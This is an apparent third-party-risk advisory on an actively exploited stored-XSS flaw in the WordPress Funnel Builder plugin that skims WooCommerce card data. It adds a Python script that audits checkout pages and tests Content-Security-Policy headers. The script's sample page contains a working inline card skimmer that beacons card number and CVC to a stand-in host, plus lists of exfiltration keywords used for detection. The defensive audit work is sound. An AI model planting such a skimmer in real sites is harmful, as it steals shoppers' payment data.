Critical Funnel Builder Plugin Vulnerability Enables WooCommerce Checkout Skimming
What Happened – A zero‑day flaw in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages. The script harvests payment‑card details and forwards them to attacker‑controlled servers.
Why It Matters for TPRM –
- Direct exposure of cardholder data breaches PCI‑DSS obligations and can trigger costly fines.
- The exploit targets a widely‑used third‑party plugin, meaning any vendor that bundles or recommends Funnel Builder inherits the risk.
- Active exploitation indicates a short window for remediation; delayed action amplifies liability.
Who Is Affected – Retail & e‑commerce sites running WordPress + WooCommerce that have installed the Funnel Builder plugin; managed service providers that host such sites; any supply‑chain partner that relies on the compromised plugin for checkout flows.
Recommended Actions –
- Update Funnel Builder to the patched version released by the plugin author without delay, or disable/remove the plugin until you can; also rotate any WordPress administrator and API credentials the compromised site could have exposed.
- Enforce a strict Content‑Security‑Policy (CSP) on checkout pages. CSP only helps if script‑src omits 'unsafe‑inline' and broad scheme sources such as https:, and instead names the few legitimate script origins plus a nonce or hash for the site's own inline scripts; also restrict connect‑src, img‑src and form‑action so a script that does run has nowhere to send card data. Subresource‑Integrity (SRI) protects scripts the site itself references with an integrity attribute; it does nothing against a tag the attacker injects, so treat it as a complement to CSP, not a substitute.
- Conduct a forensic review for signs of data exfiltration: inspect the live checkout page source and the plugin's stored settings and templates for injected script, check server and WAF logs over the exposure window for requests to unfamiliar domains, and treat card data entered during that window as potentially compromised.
- Re‑validate PCI‑DSS compliance, follow your acquirer's incident‑notification obligations if compromise is confirmed, and update third‑party risk registers to reflect the new vulnerability.
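The checks above can be scripted. The following is an added example, not code from the advisory, the plugin author or the reporting firm: it inventories the scripts on a captured checkout page, flags likely skimmers (external scripts off an allowlist, and inline scripts that both read card fields and talk to the network), and tests whether a given Content‑Security‑Policy would have stopped each one. The store origin, the allowlist, the sample page and the attacker host (on the reserved .invalid TLD) are all constructed for the example; in real use you would feed it the checkout HTML and the Content‑Security‑Policy response header captured with curl or the browser.

```python
"""Audit a captured WooCommerce checkout page for injected scripts and check a
CSP against them. All inputs are constructed for this example (see lead-in)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

PAGE_ORIGIN = "https://shop.example"                          # hypothetical store
ALLOWED_SCRIPT_ORIGINS = {PAGE_ORIGIN, "https://js.stripe.com"}  # assumed allowlist
CARD_HINTS = ("card", "cvv", "cvc", "expir", "ccnumber")      # reads card fields
EXFIL_HINTS = ("fetch(", "xmlhttprequest", "sendbeacon", "new image", "websocket")


class ScriptCollector(HTMLParser):
    """Collects external script srcs and inline script bodies from page HTML."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None            # non-None while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def script_origin(src):
    """Normalise a script src to an origin; relative URLs belong to the page."""
    u = urlparse(src)
    if not u.netloc:
        return PAGE_ORIGIN
    return f"{u.scheme or 'https'}://{u.netloc}"   # //host inherits the page scheme


def find_skimmer_candidates(html):
    """Return (kind, value) findings worth a human look."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = [("external", s) for s in p.external
                if script_origin(s) not in ALLOWED_SCRIPT_ORIGINS]
    for body in p.inline:
        low = body.lower()
        if any(h in low for h in CARD_HINTS) and any(h in low for h in EXFIL_HINTS):
            findings.append(("inline", body))
    return findings


def parse_csp(header):
    """Map directive name -> list of source expressions."""
    out = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            out[tokens[0].lower()] = tokens[1:]
    return out


def _source_allows(expr, origin):
    """Simplified CSP host-source matching: '*', 'self', scheme:, host, *.host."""
    if expr == "*":
        return True
    if expr == "'self'":
        return origin == PAGE_ORIGIN
    if expr.startswith("'"):                    # nonces, hashes, unsafe-* match no host
        return False
    if expr.endswith(":"):                      # scheme-source such as https:
        return origin.startswith(expr + "//")
    e, o = urlparse(expr if "//" in expr else "//" + expr), urlparse(origin)
    if e.scheme and e.scheme != o.scheme:
        return False
    if e.netloc.startswith("*."):
        return o.netloc.endswith(e.netloc[1:])
    return o.netloc == e.netloc


def csp_blocks(header, finding):
    """Would this policy stop the finding from executing? (simplified CSP3 rules)"""
    d = parse_csp(header)
    if "script-src" in d:
        sources = d["script-src"]
    elif "default-src" in d:
        sources = d["default-src"]
    else:
        return False                            # no applicable directive: nothing blocked
    kind, value = finding
    if kind == "inline":
        nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
                            for s in sources)
        # browsers ignore 'unsafe-inline' once a nonce or hash is present
        return not ("'unsafe-inline'" in sources and not nonce_or_hash)
    return not any(_source_allows(s, script_origin(value)) for s in sources)


def audit(html, csp_header):
    return [{"kind": k, "value": v, "blocked": csp_blocks(csp_header, (k, v))}
            for k, v in find_skimmer_candidates(html)]


# Constructed checkout page: legitimate Stripe and jQuery scripts, a harmless
# WooCommerce inline script, then an injected skimmer and its loader.
CHECKOUT_HTML = """<html><head>
<script src="https://js.stripe.com/v3/"></script>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>var wc_checkout_params = {"ajax_url":"/wp-admin/admin-ajax.php"};</script>
<script>document.querySelector('#place_order').addEventListener('click',function(){
 var n=document.querySelector('#card-number').value,c=document.querySelector('#card-cvc').value;
 new Image().src='https://collect.invalid/p?d='+btoa(n+'|'+c);});</script>
<script src="//collect.invalid/loader.js"></script>
</head><body></body></html>"""

WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:"
STRICT_CSP = ("default-src 'self'; script-src 'self' 'nonce-QmFzZTY0' https://js.stripe.com; "
              "connect-src 'self' https://api.stripe.com; img-src 'self'; form-action 'self'")

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        for r in audit(CHECKOUT_HTML, policy):
            print(f"{name:6} {r['kind']:8} blocked={r['blocked']}  {r['value'][:60]!r}")
```

Run against the constructed page, the weak policy lets both the inline skimmer and the external loader execute (because of 'unsafe‑inline' and the bare https: source), while the strict policy blocks both. The strict policy's img‑src and connect‑src are the second layer: even a script that somehow runs cannot beacon to collect.invalid. Rolling a nonce‑based script‑src out on a WordPress site means every legitimate inline script has to carry the nonce, which usually takes a plugin or theme change, so test it in report‑only mode first.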
Technical Notes – The flaw is a server‑side input‑validation bypass that allows arbitrary JavaScript injection (a classic stored XSS). No CVE has been assigned yet, but security firm Sansec has confirmed active exploitation in the wild. Affected data includes full payment‑card numbers, expiration dates, and CVV codes. Source: The Hacker News